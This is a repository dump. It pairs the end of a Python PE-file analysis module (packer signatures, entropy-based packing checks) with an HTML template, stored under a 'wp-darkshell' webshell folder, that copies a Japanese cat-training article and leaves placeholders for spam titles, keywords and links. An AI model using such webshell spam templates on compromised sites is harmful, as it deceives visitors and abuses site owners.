438 | 
439 |             signature = signature.replace('\\n', '').strip()
440 | 
441 |             signature_bytes = [to_byte(b) for b in signature.split()]
442 | 
443 |             if ep_only == 'true':
444 |                 ep_only = True
445 |             else:
446 |                 ep_only = False
447 | 
448 |             if section_start_only == 'true':
449 |                 section_start_only = True
450 |             else:
451 |                 section_start_only = False
452 | 
453 | 
454 |             depth = 0
455 | 
456 |             if section_start_only is True:
457 | 
458 |                 tree = self.signature_tree_section_start
459 |                 self.signature_count_section_start += 1
460 | 
461 |             else:
462 |                 if ep_only is True :
463 |                     tree = self.signature_tree_eponly_true
464 |                     self.signature_count_eponly_true += 1
465 |                 else :
466 |                     tree = self.signature_tree_eponly_false
467 |                     self.signature_count_eponly_false += 1
468 | 
469 |             for idx, byte in enumerate (signature_bytes) :
470 | 
471 |                 if idx+1 == len(signature_bytes):
472 | 
473 |                     tree[byte] = tree.get( byte, dict() )
474 |                     tree[byte][packer_name] = None
475 | 
476 |                 else :
477 | 
478 |                     tree[byte] = tree.get ( byte, dict() )
479 | 
480 |                 tree = tree[byte]
481 |                 depth += 1
482 | 
483 |             if depth > self.max_depth:
484 |                 self.max_depth = depth
485 | 
486 | 
487 | 
488 | 
489 | def is_valid( pe ):
490 |     """"""
491 |     pass
492 | 
493 | 
494 | def is_suspicious( pe ):
495 |     """
496 |     unusual locations of import tables
497 |     non recognized section names
498 |     presence of long ASCII strings
499 |     """
500 | 
501 |     relocations_overlap_entry_point = False
502 |     sequential_relocs = 0
503 | 
504 |     # If relocation data is found and the entries go over the entry point, and also are very
505 |     # continuous or point outside section's boundaries => it might imply that an obfuscation
506 |     # trick is being used or the relocations are corrupt (maybe intentionally)
507 |     #
508 |     if hasattr(pe, 'DIRECTORY_ENTRY_BASERELOC'):
509 |         for base_reloc in pe.DIRECTORY_ENTRY_BASERELOC:
510 |             last_reloc_rva = None
511 |             for reloc in base_reloc.entries:
512 |                 if reloc.rva <= pe.OPTIONAL_HEADER.AddressOfEntryPoint <= reloc.rva + 4:
513 |                     relocations_overlap_entry_point = True
514 | 
515 |                 if last_reloc_rva is not None and last_reloc_rva <= reloc.rva <= last_reloc_rva + 4:
516 |                     sequential_relocs += 1
517 | 
518 |                 last_reloc_rva = reloc.rva
519 | 
520 | 
521 | 
522 |     # If import tables or strings exist (are pointed to) to within the header or in the area
523 |     # between the PE header and the first section that's supicious
524 |     #
525 |     # IMPLEMENT
526 | 
527 | 
528 |     warnings_while_parsing = False
529 |     # If we have warnings, that's suspicious, some of those will be because of out-of-ordinary
530 |     # values are found in the PE header fields
531 |     # Things that are reported in warnings:
532 |     # (parsing problems, special section characteristics i.e. W & X, uncommon values of fields,
533 |     # unusual entrypoint, suspicious imports)
534 |     #
535 |     warnings = pe.get_warnings()
536 |     if warnings:
537 |         warnings_while_parsing
538 | 
539 |     # If there are few or none (should come with a standard "density" of strings/kilobytes of data) longer (>8)
540 |     # ascii sequences that might indicate packed data, (this is similar to the entropy test in some ways but
541 |     # might help to discard cases of legitimate installer or compressed data)
542 | 
543 |     # If compressed data (high entropy) and is_driver => uuuuhhh, nasty
544 | 
545 |     pass
546 | 
547 | 
548 | def is_probably_packed( pe ):
549 |     """Returns True is there is a high likelihood that a file is packed or contains compressed data.
550 | 
551 |     The sections of the PE file will be analyzed, if enough sections
552 |     look like containing containing compressed data and the data makes
553 |     up for more than 20% of the total file size. The function will
554 |     return True.
555 |     """
556 | 
557 |     # Calculate the lenth of the data up to the end of the last section in the
558 |     # file. Overlay data won't be taken into account
559 |     #
560 |     total_pe_data_length = len( pe.trim() )
561 |     has_significant_amount_of_compressed_data = False
562 | 
563 |     # If some of the sections have high entropy and they make for more than 20% of the file's size
564 |     # it's assumed that it could be an installer or a packed file
565 | 
566 |     total_compressed_data = 0
567 |     for section in pe.sections:
568 |         s_entropy = section.get_entropy()
569 |         s_length = len( section.get_data() )
570 |         # The value of 7.4 is empircal, based of looking at a few files packed
571 |         # by different packers
572 |         if s_entropy > 7.4:
573 |             total_compressed_data += s_length
574 | 
575 |     if ((1.0 * total_compressed_data)/total_pe_data_length) > .2:
576 |         has_significant_amount_of_compressed_data = True
577 | 
578 |     return has_significant_amount_of_compressed_data
579 | 
580 | 
581 | 
582 | 


--------------------------------------------------------------------------------
/shells/wp-darkshell/moban.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="ja">
  3 | <head>
  4 | <meta charset="UTF-8">
  5 | <meta name="viewport" content="width=device-width,initial-scale=1.0">
  6 | <title>#bbbtitsbbb#</title>
  7 | <meta name="keywords"  content="#bbbkeybbb#" />
  8 | <meta name="description" content="#bbbdesbbb#">
  9 | 
 10 | <!-- All in One SEO Pack 2.3.10.1 by Michael Torbert of Semper Fi Web Design[-1,-1] -->
 11 | <meta name="description"  content="#bbbdesbbb#" />
 12 | 
 13 | 
 14 | <!-- /all in one seo pack -->
 15 | 
 16 | 
 17 | 
 18 | 		
 19 | 		
 20 | 
 21 | 
 22 | 
 23 | 
 24 | 
 25 | 
 26 | 
 27 | 
 28 | 
 29 | 
 30 | 
 31 | 
 32 | 
 33 | 
 34 | 
 35 | 
 36 | 
 37 | 
 38 | 
 39 | 
 40 | 
 41 | 				<!-- WordPress Popular Posts v3.3.4 -->
 42 | 		
 43 | 				<!-- End WordPress Popular Posts v3.3.4 -->
 44 | 				
 45 | <!-- Jetpack Open Graph Tags -->
 46 | <meta property="og:type" content="article" />
 47 | <meta property="og:title" content="#bbbtitsbbb#" />
 48 | 
 49 | <meta property="og:description" content="#bbbdesbbb#" />
 50 | <meta property="article:published_time" content="2016-09-12T03:35:58+00:00" />
 51 | <meta property="article:modified_time" content="2016-09-12T03:39:19+00:00" />
 52 | 
 53 | 
 54 | <meta property="og:image:width" content="834" />
 55 | <meta property="og:image:height" content="370" />
 56 | <meta property="og:locale" content="ja_JP" />
 57 | <meta name="twitter:image" content="/wp-content/uploads/2016/09/e8b2fdf8cc72897c9afbaac18c4e828e.png?w=640" />
 58 | <meta name="twitter:card" content="summary_large_image" />
 59 | 
 60 | 
 61 | 
 62 | <meta name="msapplication-TileImage" content="/wp-content/uploads/2016/08/9d022d916e5f610752b62c8253bc5730-2.png" />
 63 | 			
 64 | 	
 65 | <base href="/" />
 66 | </head>
 67 | <body class="page page-id-5423 page-template page-template-page-noside page-template-page-noside-php">
 68 | <h1>#bbbtitlebbb#</h1>
 69 | <p>#descontent#</p>
 70 | 
 71 | <div id="wrapper">
 72 | 	<!-- header -->
 73 | 	<div id="header">
 74 | 		<!-- logo -->
 75 | 		<div id="logo-area">
 76 | 			<div id='logo_image'>
 77 | <div id="logo" style="top:5px; left:351px;"><a href=" /" title="キャットフードの選び方・子猫の育て方をまとめるサイト | ネコぱんち！" data-label="キャットフードの選び方・子猫の育て方をまとめるサイト | ネコぱんち！"></a></div>
 78 | </div>
 79 | 		</div>
 80 | 		<!-- /logo -->
 81 | 		<!-- <a href="#" class="menu_button">menu</a> -->
 82 | 		<!-- social link -->
 83 | 				<div id="header_sociallink">
 84 | 			<ul class="social_link">
 85 | 									<li class="facebook"><a class="target_blank" href="/%E3%83%8D%E3%82%B3%E3%81%B1%E3%82%93%E3%81%A1-1034845636577415/">facebook</a></li>
 86 | 													<li class="twitter"><a class="target_blank" href="/nekopunman">twitter</a></li>
 87 | 													<li class="rss"><a class="target_blank" href="/feed/">rss</a></li>
 88 | 							</ul>
 89 | 		</div>
 90 | 				<!-- social link -->
 91 | 		<!-- global menu -->
 92 | 				<div id="global_menu" class="clearfix">
 93 | 							<ul id="menu-%e3%82%b9%e3%83%9e%e3%83%9b%e5%90%91%e3%81%91" class="menu"><li id="menu-item-35" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-35"><a href="/">ホーム</a></li>
 94 | <li id="menu-item-2038" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2038"><a href="/cat-food-safety/">キャットフードランキング</a></li>
 95 | <li id="menu-item-5468" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-5468"><a href="/cat-discipline-resolution/">猫のしつけ</a></li>
 96 | <li id="menu-item-2869" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2869"><a href="/category/cat-food/">キャットフード</a></li>
 97 | <li id="menu-item-40" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40"><a href="/category/cat-sick/">猫の病気</a></li>
 98 | <li id="menu-item-42" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-42"><a href="/category/colmun/">猫コラム</a></li>
 99 | <li id="menu-item-4856" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4856"><a href="/kitten-upbringing-how-to-tame/">子猫初心者向け</a></li>
100 | </ul>					</div>
101 | 				<!-- /global menu -->
102 | 	</div>
103 | 	<!-- /header -->
104 | 	<!-- contents -->
105 | 	<div id="contents" class="clearfix">
106 | 		<!-- mainColumn -->
107 | 		<div id="mainColumn-noside" class="pt25">
108 | 					<p class="eyecatch"><noscript></noscript></p>			<!-- content -->
109 | 			<div class="post">
110 | 				<h1 class="post-title">猫に嫌われない正しいしつけ方法とは？「困った！」を解消するしつけ知識まとめ</h1>
111 | 				<div id="toc_container" class="no_bullets"><p class="toc_title">【今回のお話】</p><ul class="toc_list"><li><a href="#i"><span class="toc_number toc_depth_1">1</span> 猫をしつける時の大前提</a><ul><li><a href="#i-2"><span class="toc_number toc_depth_2">1.1</span> 「正しいタイミングで」「褒める」</a></li></ul></li><li><a href="#i-3"><span class="toc_number toc_depth_1">2</span> 猫のしつけ、４つのポイント</a><ul><li><a href="#i-4"><span class="toc_number toc_depth_2">2.1</span> しつけ原則１：わかりやすくしつける</a></li><li><a href="#i-5"><span class="toc_number toc_depth_2">2.2</span> しつけ原則２：叩くのはしつけではない</a></li><li><a href="#i-6"><span class="toc_number toc_depth_2">2.3</span> しつけ原則３：猫のしつけには時間が掛かる</a></li><li><a href="#i-7"><span class="toc_number toc_depth_2">2.4</span> しつけ原則４：落ち着いて、ギャァギャァ騒がない！</a></li></ul></li><li><a href="#i-8"><span class="toc_number toc_depth_1">3</span> そこには乗らないで！</a></li><li><a href="#i-9"><span class="toc_number toc_depth_1">4</span> 噛み癖や爪研ぎをしつけたい</a></li><li><a href="#i-10"><span class="toc_number toc_depth_1">5</span> トイレは最も多いしつけの悩みかも</a></li><li><a href="#i-11"><span class="toc_number toc_depth_1">6</span> 盗み食いがひどい場合</a></li><li><a href="#i-12"><span class="toc_number toc_depth_1">7</span> 早朝、日が昇らないうちに起こされる</a></li><li><a href="#i-13"><span class="toc_number toc_depth_1">8</span> 移動の時、キャリーに入ってくれない</a></li><li><a href="#i-14"><span class="toc_number toc_depth_1">9</span> 音や匂いなどを利用して猫ちゃんを躾けよう</a></li></ul></div>
112 | <h3 class="news_headline3"><span id="i"><i class="fa fa-paw" style="color: #73626e; font-size: 1em; margin-right: 9px;"></i>猫をしつける時の大前提</span></h3>
113 | <p><noscript></noscript></p>
114 | <p>しつけなければいけない猫の行動、そして、しつける方法も数多くあります。</p>
115 | <p>ただ、闇雲に飼い主の勝手な「<strong>なんちゃってしつけ」</strong>を押しつけるのも考えものですよね。</p>
116 | <p>まずはしっかり、しつけをする前の「大前提」を抑えてからしつけに臨みましょう。</p>
117 | <h4 class="news_headline4"><span id="i-2">「正しいタイミングで」「褒める」</span></h4>
118 | <p>いろいろなしつけ方法がありますが、猫をしつける時はこの二つが大前提となります。</p>
119 | <p>もちろん猫の性格によってこれだけではダメな場合もありますが、正しく実践するのなら、<strong>「褒める」「タイミング」が欠かせません。</strong></p>
120 | <p>まずはタイミング。例えば、「帰ってきたら、大事なものが爪の餌食になっていた」とします。</p>
121 | <p>この場合、今から猫を叱っても効果はありません。時間が経ってしまっているので、猫からしてみると</p>
122 | <p><span style="color: #000080;"><strong>「何が怒られる要因なのか」</strong></span></p>
123 | <p>が、わからないのです。</p>
124 | <p>ですので、大切な物はしまっておかなければならなかった。ということ。<strong>反省するのは、飼い主側でなければならない事も多いです。</strong></p>
125 | <p>反対に、飼い主が見ている時に悪いことをしようとしているのなら、チャンスです。何かをやろうとした瞬間、もしくはその後に大きな音や声、嫌がる匂いで脅かすなどすれば、</p>
126 | <p>「これはやっちゃいけないんだ」</p>
127 | <p>と覚えることができます。猫をしつける上では「<span style="font-size: 14pt;"><strong>やらかす前後にすかさずしつける</strong></span>」が、一番効果があります。</p>
128 | <p>そして、「褒める」ということ。</p>
129 | <p>脅かされているばかりでは、猫としても面白いはずがありませんよね。ですので、悪いことをしようとしたけれど、市内でに退散できた時jは<span style="font-size: 14pt;"><strong>思い切り褒めてあげましょう。</strong></span></p>
130 | <p>こうすることで猫も「こうすれば褒められた」と、覚えることができます。</p>
131 | <p>要するに「飴と鞭」ですね。厳しすぎると怖がられたりストレスになりますし、甘すぎるとなめられてしまいます。</p>
132 | <p>また、そもそも「悪さをしない、できない環境にしてしまうこと」</p>
133 | <p>これも大切です。猫は猫。人間とは違う生き物ですので、こちらが入っていることを全て理解してもらうのはムリというもの。</p>
134 | <p>ですので、危ないものやいたずらされたら困るものはそもそもおかない。開けられて困る戸棚にはロックを工夫してつけてみる。</p>
135 | <p>などなど、他にもできることはまだまだあるはずです。</p>
136 | <div class="waku">
137 | <div class="attention">CHECK!</div>
138 | <p><strong>・正しいタイミングに叱って初めて、猫は理解する</strong><br />
139 | <strong> ・怒ってばかりでなく、できたら褒める。</strong><br />
140 | <strong> ・そもそもいたずらされない環境にできないか、考える</strong></p>
141 | </div>
142 | <p>このしつけの大前提+工夫をしてみる、ということを抑えて、根気よくしつけを続けてみましょう。</p>
143 | <p>&nbsp;</p>
144 | <h3 class="news_headline3"><span id="i-3"><i class="fa fa-paw" style="color: #73626e; font-size: 1em; margin-right: 9px;"></i>猫のしつけ、４つのポイント</span></h3>
145 | <p><noscript></noscript></p>
146 | <p>猫をしつける時には、上記の前提にもう４つほど、ルールがあります。どれもこれからの人生を猫と一緒に暮らす上では欠かせません。</p>
147 | <h4 class="news_headline4"><span id="i-4">しつけ原則１：わかりやすくしつける</span></h4>
148 | <p>あなたがいくら「しつけているつもり」でも、猫からして見ると</p>
149 | <p><span style="color: #000080;"><strong>「???何言ってんだ。こいつw」</strong></span></p>
150 | <p>と思われている事もあります。</p>
151 | <p>売れない芸人の一発芸が「面白くない、記憶には残らない」と感じるのと同じで、わかりにくいしつけでは猫に<strong>「これはまずいんだな」と思わせることができません。</strong></p>
152 | <p>ですので、いつも・叱るとき・褒めるとき、この三つで飼い牛さんのリアクションがガラッと変わることが大事になります。声のトーンや挙動を、わかりやすく変えてみましょう。そして、怒るときは怒るときのトーン、褒める、撫でるときはそのときのトーンなど、パターン化してみてください。</p>
153 | <p>そうすることによって猫も、「このときは怒ってる時」などと、理解することができます。</p>
154 | <p>褒める時は、「これをやったら褒められた、良いことがあった」と思わせられるよう、ご褒美を用意しておくのも上手い手でです。無駄におやつをなんとなく上げるくらいなら、良いことをしたご褒美としてあげたほうが、良い与え方になりそうですよね。</p>
155 | <p><span style="font-size: 14pt;"><strong>「メリハリ」を意識してしつけを行うと、猫もスムーズに覚えられる</strong></span>でしょう。</p>
156 | <p>&nbsp;</p>
157 | <p>&nbsp;</p>
158 | <h4 class="news_headline4"><span id="i-5">しつけ原則２：叩くのはしつけではない</span></h4>
159 | <p>犬や人間と比べ、猫はとっても臆病です。そして、「痛い目を見た」という経験は絶対に忘れませんので、叩く、蹴るなどの体罰は絶対にNGです。</p>
160 | <p>今までワンちゃんを飼っていて、その時は叩いてしつけた。という方も、<strong>猫には通用しない</strong>と心得ておきましょう。下手をすると、言うことを聞くどころか全く寄ってこなくなる可能性が大きいです。</p>
161 | <p>叩き続けると、その人のことを「敵だ」と認識するようになります。すり寄ってくるかわいい猫に育てたい場合は、特にキーポイントになるでしょう。</p>
162 | <p>また、「叩くぞ！」と、<strong>手を振り上げることにはあまり効果はありません。</strong>特に叩かれたことのない猫の場合「何やってんの？」くらいにしか思いません。</p>
163 | <p>どのみち叩くことができないことを考えると、そう言ったしつけ方法に意味がないことがわかるでしょう。</p>
164 | <p>しつけ＝叩くという発想では、猫はしつけることはできない。というか、<span style="font-size: 14pt;"><strong>猫を飼う資格がない。</strong></span></p>
165 | <p>この点も肝に銘じておきましょう！</p>
166 | <p><noscript></noscript><br />
167 | <span style="color: #000080;"><strong>▶︎▶︎<a style="color: #000080;" href="/neko-tataku-ng/">しつけでも叩くのはNG！嫌われることになります。</a></strong></span></p>
168 | <p>&nbsp;</p>
169 | <h4 class="news_headline4"><span id="i-6"><span style="line-height: 1.5;">しつけ原則３：猫のしつけには時間が掛かる</span></span></h4>
170 | <p>一回言っただけでダメなことを覚えてもらえれば一番ですが、そうはいきませんよね。何度も繰り返して、<strong>長い目で見てあげるのが大切です。</strong></p>
171 | <p>そして、妥協しないことも重要なポイント。</p>
172 | <p>「もう面倒くさい&#8230;」と諦めたら、そこでしつけは終わってしまいます。あれだけエネルギーを使って今までしつけを頑張ってきたのに、今やめたらすべて水の泡になってしまいますからね。</p>
173 | <p>何度行っても聞かないし無駄。ではなく、わかるまで工夫してしつけ続ける。これが必要になるでしょう。</p>
174 | <p>思ったよか、猫のしつけには根気がいることを覚悟しておいてください。</p>
175 | <h4 class="news_headline4"><span id="i-7">しつけ原則４：落ち着いて、ギャァギャァ騒がない！</span></h4>
176 | <p>しつけにメリハリは大事。しかし、猫に「遊んでもらった！楽しい！」と思われるような態度ではいけません。そうなると、「悪いことした＝しつけ＝遊んでくれる」と勘違いされてしまいます。ですので、オーバーすぎ、猫にとって嬉しいであろうリアクションは厳禁です。</p>
177 | <p>特に、朝方寝ている時に起こされてしまう。こんな時。「うるさい！」と怒ると「起きた！？今起きたっしょ！」と思われ、いつまでたってもしつけることができません。場合によっては、心を鬼にしてシカトすることも必要になる。これも、合わせて覚えておきたいですね。</p>
178 | <div class="waku">
179 | <div class="attention">CHECK!</div>
180 | <ol>
181 | <li><strong>長い目でしつける・育てる</strong></li>
182 | <li><strong>ギャァギャア騒ぎすぎない</strong></li>
183 | <li><strong>メリハリをつけてしかる・褒める</strong></li>
184 | <li><strong> 体罰はしつけではない（猫を飼う資格はない）</strong></li>
185 | </ol>
186 | 
187 | <div>#links2#</div></div>
188 | <p>&nbsp;</p>
189 | <h3 class="news_headline3"><span id="i-8"><i class="fa fa-paw" style="color: #73626e; font-size: 1em; margin-right: 9px;"></i>そこには乗らないで！</span></h3>
190 | <p><noscript></noscript></p>
191 | <p>猫のしつけでも多くの人が悩むのが「そこに乗って欲しくないのに」というところ乗る。これではないでしょうか。</p>
192 | <p>机の上が毛だらけになるとご飯の時気になりますし、壊物の近くには近寄って欲しくないですよね。</p>
193 | <p>コンロ周りなどは、火元なのでなるべく触らないでほしいというのが本音です。</p>
194 | <p>対策としては、</p>
195 | <p>&nbsp;</p>
196 | <p><strong>・そもそも乗れないようにする</strong><br />
197 | <strong> ・乗る前に別のものに気をそらす</strong><br />
198 | <strong> ・「乗ったら怖い事起きた！」と思わせる</strong></p>
199 | <p>などが有効です。</p>
200 | <p>「乗る」という事は<strong>そこに「興味がある」という事。</strong></p>
201 | <p>興味がなくなったり、乗る事にデメリットがあると感じてもらえれば、自然とそこには乗らなくなるでしょう。</p>
202 | <p><noscript></noscript><br />
203 | <span style="color: #000080;"><strong>▶︎▶︎<a style="color: #000080;" href="/nekoshituke/">キッチンに上がる猫をしつけたい！しつけ方・対策まとめ</a></strong></span></p>
204 | <p>&nbsp;</p>
205 | <h3 class="news_headline3"><span id="i-9"><i class="fa fa-paw" style="color: #73626e; font-size: 1em; margin-right: 9px;"></i>噛み癖や爪研ぎをしつけたい</span></h3>
206 | <p><noscript></noscript></p>
207 | <p>噛み癖は爪研ぎは猫の本能ですので、しつけるのが難しいです。それこそ、かなりの根気が必要になります。</p>
208 | <p>噛み癖の場合、「指は遊びものなんだ」と思われているケースも多いです。ですので、遊んであげるときは手を使わない事。そして、代わりにおもちゃで遊んであげるようにします。そうする事によって、嚙みつく対象がおもちゃとなり、変なものをｶｼﾞカジすることは減っていくでしょう。</p>
209 | <p>爪研ぎは、こちらが譲らなければいけないかもしれませんね。爪研ぎおもちゃをたくさん部屋の中に置いたり、いつもがギガりするところに縦置きのダンボール爪研ぎを置くなど、工夫が必要になります。</p>
210 | <p>完全にやめさせるのは不可能ですので、早急に爪研ぎの用意をしましょう。</p>
211 | <p><noscript></noscript><br />
212 | <span style="color: #333399;"><strong>▶︎▶︎<a style="color: #333399;" href="/cat-nail-bite/">【噛み癖・爪研ぎ】猫に負担のないしつけ方・直す方法まとめ<br />
213 | </a>▶︎▶︎<a style="color: #333399;" href="/kitten-nail/">子猫に家具をやられる前に！被害に遭わないための爪研ぎの知識まとめ</a></strong></span></p>
214 | <p>&nbsp;</p>
215 | <h3 class="news_headline3"><span id="i-10"><i class="fa fa-paw" style="color: #73626e; font-size: 1em; margin-right: 9px;"></i>トイレは最も多いしつけの悩みかも</span></h3>
216 | <p><noscript></noscript></p>
217 | <p>匂いがきになるので、トイレも早急になんとかしたいしつけポイントですよね。ほおっておくと間違った場所をトイレだと認識してしまうので、早めの対策が必要です。</p>
218 | <p>まずは、トイレをしそうなタイミングでトイレに飼い主が連れて行ってあげること。猫は砂の上で用を足す修正がもともとあるので、これだけでも繰り返せば覚えてくれます。一緒にいるタイミングでは、猫のソワソワを見逃さないようにしましょう。ここでも、上手にできたら褒めたり、ご褒美を用意しておくことが効果的。</p>
219 | <p>また、トイレの環境の良し悪しも粗相の原因となります。トイレでしない＝トイレに何か、気にくわない要因がある。これも粗相の原因としては多いものです。</p>
220 | <p>トイレの位置や砂の質感。そして、トイレのタイプ。この辺りもトイレのしつけ方法とあ合わせて、覚えておきたいですね。</p>
221 | <p><noscript></noscript><br />
222 | <span style="color: #333399;"><strong>▶︎▶︎<a href="/cat-toilet/">【猫のトイレのしつけ方】正しい覚えさせ方と注意点まとめ</a></strong></span><br />
223 | <span style="color: #333399;"><strong>▶︎▶︎<a style="color: #333399;" href="/kitten-toilet-how-to/">子猫を飼うなら知っておきたい！トイレの教え方&amp;</a></strong></span><span style="color: #333399;"><strong><a style="color: #333399;" href="/kitten-toilet-how-to/">快適なトイレ環境の整え方</a></strong></span></p>
224 | <p>&nbsp;</p>
225 | <h3 class="news_headline3"><span id="i-11"><i class="fa fa-paw" style="color: #73626e; font-size: 1em; margin-right: 9px;"></i>盗み食いがひどい場合</span></h3>
226 | <p><noscript></noscript></p>
227 | <p>飼い主の食事中、盗み喰いをしようとする。この場合、前述の「乗って欲しくない所に昇らないようにする」の方法が有効です。</p>
228 | <p>問題は、飼い主の目の届かない時間帯ですね。ゴミ箱や冷蔵庫を勝手に開けて、好き放題食い散らかす猫も少なくありません。この場合、しつけるのは難しいのでストッパーをつけるのが良いでしょう。（１００円均一にも売ってます。こうするだけで、漁られることは無くなります。</p>
229 | <p>洗い残しの食器や三角コーナーは、そもそも置かないのがベスト。食べたらすぐ洗い、生ごみは水を切ってポリ袋に。匂いがしないように工夫して猫の目の届かないように捨てる。</p>
230 | <p>少々面倒ですが、盗み食い被害ゼロを目指すならこれくらいしなくてはなりません。（残飯の中には、猫が食べると体をこわす物もあります。）</p>
231 | <p><noscript></noscript><br />
232 | ▶︎<span style="color: #333399;"><strong>▶︎<a href="/ca-not-eat-meat/">猫に食べさせてはいけない！害のある食べ物まとめ</a></strong></span></p>
233 | <p>&nbsp;</p>
234 | <h3 class="news_headline3"><span id="i-12"><i class="fa fa-paw" style="color: #73626e; font-size: 1em; margin-right: 9px;"></i>早朝、日が昇らないうちに起こされる</span></h3>
235 | <p><noscript></noscript></p>
236 | <p>朝、まだ寝ていたい時間に起こされる。「かまって！」という感じが可愛いですが、飼い主としては辛いですよね。これに対しては</p>
237 | <p>・夜にうちに遊んでおく<br />
238 | ・起こされても無視<br />
239 | ・他の要求は聞いてあげる</p>
240 | <p>の三つが有効です。</p>
241 | <p>朝早く起きて暴れる・起こしにくるのは、あなたともっと遊びたいからです。その欲求を、朝ではなく夜に満たしておきましょう。そして、朝来ても無視。心を鬼にしてシカトを続けてください、一回でも朝かまってあげると、「朝は起こして、遊んでもらえる」と思われます。むやみに要求に答えてはいけません。</p>
242 | <p>それで飼い主が「かわいそう&#8230;」と思うなら、他の要求を呑んであげれば良いだけです。おやつをあげたり、１０分だけ猫じゃらしで遊んであげたりなどですね。</p>
243 | <p>できる時にできる事をしてあげて、そうでない時は無視</p>
244 | <p>これで大丈夫です。猫の要求にいつでも答えるのは優しさではないので、注意したいですね。最後に辛いのは飼い主なので。</p>
245 | <p><noscript></noscript><br />
246 | <span style="color: #333399;">▶︎<strong>▶︎<a style="color: #333399;" href="/cat-nitghabareru/">猫は夜、暴れる！夜の大運動会を開催する理由と防止方法とは</a></strong></span></p>
247 | <p>&nbsp;</p>
248 | <h3 class="news_headline3"><span id="i-13"><i class="fa fa-paw" style="color: #73626e; font-size: 1em; margin-right: 9px;"></i>移動の時、キャリーに入ってくれない</span></h3>
249 | <p><noscript></noscript></p>
250 | <p>動物病院に行く時などは、猫用のキャリケースに入ってもらう事になりますよね。</p>
251 | <p>ただ、猫によってはこのキャリーを嫌がる子もいます。</p>
252 | <p>もしそうなら、今から部屋にキャリーを出しっぱにしておきましょう。そして、キャリーに日常的に入ってもらい、慣れてもらうのが良いです。</p>
253 | <p>おやつやご飯を食べる場所にしたり、毛布を引いて寝心地の良いベッドにしたりと、工夫してみましょう。</p>
254 | <p>キャリーを嫌がる子は「なんだこの狭い空間は..」と思っているはず。</p>
255 | <p>そうではなく、慣れ親しんだ特に害のない場所とわかれば、入るのもやでは無くなります。</p>
256 | <p><noscript></noscript><br />
257 | <span style="color: #000080;"><strong>▶︎▶︎<a style="color: #000080;" href="/cat-cage/">猫のケージ飼いはかわいそう？ストレス対策だけは忘れずに！</a></strong></span></p>
258 | <p>&nbsp;</p>
259 | <h3 class="news_headline3"><span id="i-14"><i class="fa fa-paw" style="color: #73626e; font-size: 1em; margin-right: 9px;"></i>音や匂いなどを利用して猫ちゃんを躾けよう</span></h3>
260 | <p><noscript></noscript></p>
261 | <p>しつけにも色々なやり方があります。</p>
262 | <p>体罰はいけませんが、ある程度の工夫は必要ですので、音や匂いなどを駆使しましょう。</p>
263 | <p>猫をスピーディーにしつけられるよう頑張ってみてください。</p>
264 | <p><noscript></noscript></p>
265 | <p><span style="color: #333399;"><strong>▶︎▶︎<a href="/neko-sound/">猫の嫌いな音をしつけで活用！やり方・注意点まとめ</a></strong></span><br />
266 | <span style="color: #333399;"><strong>▶︎▶︎<a style="color: #333399;" href="/cat-sp-shituke/">猫ちゃんをスプレーでしつける！おすすめ商品と使い方まとめ<br />
267 | </a></strong></span><span style="color: #333399;"><strong>▶︎▶︎<a style="color: #333399;" href="/cat-hate-smell/">「これは嫌い！」猫が嫌がる匂いの種類まとめ</a></strong></span></p>
268 | <p>&nbsp;</p>
269 | <p>&nbsp;</p>
270 | <p>&nbsp;</p>
271 | 							</div>
272 | 					<!-- /content -->
273 | 	
274 | 			<!-- bookmark -->
275 | 						<!-- /bookmark -->
276 | 	
277 | 		</div>
278 | 		<!-- /mainColumn -->
279 | 	</div>
280 | 	<!-- /contents -->
281 | 	<!-- footer -->
282 | 	<div id="footer">
283 | 		<div id="footer-inner" class="clearfix">
284 | 			<div id="footer-left">
285 | 				<div id="footer_logo_area" style="top:0px; left:0px;">
286 | <h3 id="footer_logo">
287 | <a href="/" title="キャットフードの選び方・子猫の育て方をまとめるサイト | ネコぱんち！"></a>
288 | </h3>
289 | </div>
290 | 				<div id="footer-menu">
291 | 				</div>
292 | 			</div>
293 | 			<div id="footer-right">
294 | 												<div class="footer_widget clearfix widget_nav_menu" id="nav_menu-4">
295 | <h3 class="footer_headline">キャットフードコラム</h3>
296 | <div class="menu-%e3%82%ad%e3%83%a3%e3%83%83%e3%83%88%e3%83%95%e3%83%bc%e3%83%89%e3%82%b3%e3%83%a9%e3%83%a0-container"><ul id="menu-%e3%82%ad%e3%83%a3%e3%83%83%e3%83%88%e3%83%95%e3%83%bc%e3%83%89%e3%82%b3%e3%83%a9%e3%83%a0" class="menu"><li id="menu-item-2493" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2493"><a href="/catfood-type/">キャットフードの種類</a></li>
297 | <li id="menu-item-2127" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2127"><a href="/cat-food-safety/">安全なキャットフードの選び方</a></li>
298 | <li id="menu-item-2128" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2128"><a href="/cheap-cat-food/">安いキャットフードのデメリット</a></li>
299 | <li id="menu-item-2129" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2129"><a href="/cat-food-addition/">キャットフードに含まれる添加物</a></li>
300 | <li id="menu-item-2130" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2130"><a href="/cat-bad-breath-cat-food/">キャットフードが口臭の元に？</a></li>
301 | <li id="menu-item-2131" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2131"><a href="/dry-food-soak/">子猫の餌はいつまでふやかす？</a></li>
302 | <li id="menu-item-2134" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2134"><a href="/4dmeat/">猫の餌に潜む怖いタンパク質</a></li>
303 | <li id="menu-item-2132" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2132"><a href="/cat-food-grain-free/">グレインフリーとは</a></li>
304 | <li id="menu-item-2133" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2133"><a href="/cat-food-nutrient/">猫に必要な栄養素</a></li>
305 | <li id="menu-item-2135" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2135"><a href="/cat-food-mail-order/">高級猫餌のメリットとデメリット</a></li>
